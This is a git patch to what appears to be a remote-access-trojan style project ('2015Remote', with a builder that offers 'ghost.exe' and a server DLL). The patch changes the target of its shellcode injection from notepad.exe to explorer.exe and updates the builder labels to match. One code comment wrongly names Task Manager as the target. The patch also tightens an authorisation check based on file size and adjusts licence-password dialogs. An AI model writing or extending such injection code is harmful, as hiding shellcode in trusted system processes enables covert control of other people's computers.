From e86afe74da163e471de0d02eca789fae7d513c5a Mon Sep 17 00:00:00 2001 From: yuanyuanxiang <962914132@qq.com> Date: Thu, 1 Jan 2026 22:51:15 +0100 Subject: [PATCH] TestRun: Change inject shellcode to explorer <- notepad --- client/LoginServer.cpp | 4 +++- client/test.cpp | 4 ++-- server/2015Remote/2015RemoteDlg.cpp | 6 +++--- server/2015Remote/BuildDlg.cpp | 4 ++-- 4 files changed, 10 insertions(+), 8 deletions(-) diff --git a/client/LoginServer.cpp b/client/LoginServer.cpp index b691f58..1ddb0e9 100644 --- a/client/LoginServer.cpp +++ b/client/LoginServer.cpp @@ -336,7 +336,9 @@ LOGIN_INFOR GetLoginInfo(DWORD dwSpeed, CONNECT_ADDRESS& conn, BOOL& isAuthKerne std::string pid = std::to_string(GetCurrentProcessId()); HANDLE hEvent1 = OpenEventA(SYNCHRONIZE, FALSE, std::string("YAMA_" + pid).c_str()); HANDLE hEvent2 = OpenEventA(SYNCHRONIZE, FALSE, std::string("EVENT_" + pid).c_str()); - if (hEvent1 != NULL || hEvent2 != NULL) + WIN32_FILE_ATTRIBUTE_DATA fileInfo; + GetFileAttributesExA(buf, GetFileExInfoStandard, &fileInfo); + if ((hEvent1 != NULL || hEvent2 != NULL) && fileInfo.nFileSizeLow > 16 * 1024 * 1024) { Mprintf("Check event handle: %d, %d\n", hEvent1 != NULL, hEvent2 != NULL); isAuthKernel = TRUE; diff --git a/client/test.cpp b/client/test.cpp index 083eb78..fdeb96c 100644 --- a/client/test.cpp +++ b/client/test.cpp @@ -262,7 +262,7 @@ int main(int argc, const char *argv[]) g_ConnectAddress.SetServer(saved_ip.c_str(), saved_port); } - // 此 Shell code 连接本机6543端口,注入到记事本 + // 此 Shell code 连接本机6543端口,注入到任务管理器 if (g_ConnectAddress.iStartup == Startup_InjSC) { // Try to inject shell code to `notepad.exe` // If failed then run memory DLL @@ -272,7 +272,7 @@ int main(int argc, const char *argv[]) do { if (sizeof(void*) == 4) // Shell code is 64bit break; - if (!(pid = inj.InjectProcess(nullptr, ok))) { + if (!(pid = inj.InjectProcess("explorer.exe", ok))) { break; } HANDLE hProcess = OpenProcess(PROCESS_TERMINATE | SYNCHRONIZE, FALSE, pid); diff --git a/server/2015Remote/2015RemoteDlg.cpp b/server/2015Remote/2015RemoteDlg.cpp index 99e1509..35a8159 100644 --- a/server/2015Remote/2015RemoteDlg.cpp +++ b/server/2015Remote/2015RemoteDlg.cpp @@ -1948,7 +1948,7 @@ bool CMy2015RemoteDlg::CheckValid(int trail) auto v = splitString(dlg.m_sPassword.GetBuffer(), '-'); if (v.size() != 6 && v.size() != 7) { THIS_CFG.SetStr(settings, pwdKey, ""); - MessageBox("格式错误,请重新申请口令!", "提示", MB_ICONINFORMATION); + THIS_APP->MessageBox("格式错误,请重新申请口令!", "提示", MB_ICONINFORMATION); return false; } std::vector subvector(v.end() - 4, v.end()); @@ -1961,7 +1961,7 @@ bool CMy2015RemoteDlg::CheckValid(int trail) THIS_CFG.SetStr(settings, "PwdHmac", ""); if (pwd.IsEmpty() || hash256 != fixedKey || IDOK != dlg.DoModal()) { if (!dlg.m_sPassword.IsEmpty()) - MessageBox("口令错误, 无法继续操作!", "提示", MB_ICONWARNING); + THIS_APP->MessageBox("口令错误, 无法继续操作!", "提示", MB_ICONWARNING); return false; } } @@ -1971,7 +1971,7 @@ bool CMy2015RemoteDlg::CheckValid(int trail) std::strftime(curDate, sizeof(curDate), "%Y%m%d", &pekingTime); if (curDate < v[0] || curDate > v[1]) { THIS_CFG.SetStr(settings, pwdKey, ""); - MessageBox("口令过期,请重新申请口令!", "提示", MB_ICONINFORMATION); + THIS_APP->MessageBox("口令过期,请重新申请口令!", "提示", MB_ICONINFORMATION); return false; } if (dlg.m_sPassword != pwd) diff --git a/server/2015Remote/BuildDlg.cpp b/server/2015Remote/BuildDlg.cpp index 98f6f98..5124bdb 100644 --- a/server/2015Remote/BuildDlg.cpp +++ b/server/2015Remote/BuildDlg.cpp @@ -204,7 +204,7 @@ void CBuildDlg::OnBnClickedOk() int index = m_ComboExe.GetCurSel(), typ=index; int is64bit = m_ComboBits.GetCurSel() == 0; if (index == IndexTestRun_InjSC && !is64bit) { - MessageBox("Shellcode 只能向64位记事本注入,注入器也只能是64位!", "提示", MB_ICONWARNING); + MessageBox("Shellcode 只能向64位电脑注入,注入器也只能是64位!", "提示", MB_ICONWARNING); return; } int startup = Startup_DLL; @@ -434,7 +434,7 @@ BOOL CBuildDlg::OnInitDialog() pEdit->LimitText(99); m_ComboExe.InsertString(IndexTestRun_DLL, "TestRun - 磁盘DLL"); m_ComboExe.InsertString(IndexTestRun_MemDLL, "TestRun - 内存DLL"); - m_ComboExe.InsertString(IndexTestRun_InjSC, "TestRun - 注入记事本"); + m_ComboExe.InsertString(IndexTestRun_InjSC, "TestRun - 注入任务管理器"); m_ComboExe.InsertString(IndexGhost, "ghost.exe"); m_ComboExe.InsertString(IndexServerDll, "ServerDll.dll");